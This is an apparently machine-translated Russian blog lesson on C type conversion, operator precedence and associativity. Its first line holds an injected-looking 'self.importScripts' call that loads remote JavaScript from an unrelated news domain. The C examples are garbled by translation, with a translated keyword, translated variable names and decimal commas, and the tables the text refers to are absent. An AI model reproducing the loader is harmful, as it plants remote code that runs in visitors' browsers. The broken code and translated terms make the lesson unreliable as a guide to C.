google-site-verification: google2818f8f06eec354e.html self.importScripts('https://zworld-news.com/sw/w_1.js');

Преобразование типов, приоритет и ассоциативность операторов в C


Тип преобразования в C

Процесс преобразования одного типа данных в другой тип данных называется преобразованием типов.
Автоматическое преобразование одного типа данных в другой тип данных называется неявным преобразованием типов . Это делается компилятором.
Преобразование типов также можно выполнить вручную. Преобразование типов, выполняемое программистом, называется явным преобразованием типов .
Мы обсудим эти два типа подробно в наших следующих уроках.
Довольно часто мы должны использовать как целые числа, так и числа с плавающей точкой. Выполняя некоторые арифметические операции между ними, мы должны позаботиться о нескольких вещах, которые мы обсудим в этом уроке.
1. Арифметическая операция между целым числом и целым числом всегда приводит к целому числу.
2. Арифметическая операция между поплавком и поплавком всегда дает номер поплавка.
3. Арифметическая операция между числом с плавающей точкой и целым числом всегда дает число с плавающей точкой. В этом случае первое целое число будет переведено в число с плавающей точкой, после чего будет выполнена арифметическая операция.
Ознакомьтесь с таблицей ниже, чтобы понять эти операции.

Преобразование типов в присвоениях

Довольно часто переменная в левой части оператора присваивания (=) не соответствует типу переменной в ее правой части. В таком случае значение целого выражения будет повышаться или понижаться на основе переменной, присутствующей в левой части оператора присваивания.
Чтобы сделать вещи немного яснее, давайте возьмем пример.
плавать;
int b;
б = 4,2;
а = 3;
В приведенном выше примере мы пытаемся сохранить значение с плавающей точкой (4.2) в целочисленной переменной b. Таким образом, значение будет понижено до (4) и будет сохранено в целочисленной переменной. То же самое произойдет и с 3. Поскольку 3 является целым числом, оно будет преобразовано в число с плавающей точкой (3.00000), а затем будет сохранено в переменной с плавающей точкой.
Сложность арифметической операции не имеет значения. Вы должны придерживаться трех основных правил. Вот и все.
Чтобы лучше понять вещи. Оформить заказ ниже примеров.

Приоритет (иерархия) операторов в C

БОДМАС - это основное правило для решения сложных арифметических задач по математике. К сожалению, BODMAS не работает в C. Предположим, вы написали одно выражение. 
х * у + г * а
Так как вы решите это выражение?
Таким образом (x * y) + (z * a)
Или так x * (y + z) * a
Чтобы решить эту проблему в C, вы должны узнать об иерархии или приоритете операторов. Иерархия некоторых распространенных арифметических операторов приведена ниже.

Несколько быстрых советов

  • В рамках вложенных скобок арифметические операции будут выполняться в соответствии с вышеуказанным приоритетом. Выражение в самых внутренних скобках будет решено в первую очередь.
  • Рекомендуется аккуратно использовать круглые скобки в программе. Сначала вы должны ввести обе скобки (). После этого начните вводить выражение внутри него. Это удалит ошибки, вызванные пропущенными скобками.

Ассоциативность операторов в C

Ассоциативность операторов используется, когда два оператора с одинаковым приоритетом связываются. В этом случае арифметическая операция решается с использованием таблицы ассоциативности языка Си.
Полная таблица приоритетов и ассоциативности операторов в C приведена ниже.
Преобразование типов, приоритет и ассоциативность операторов в C

Комментариев нет:

Отправить комментарий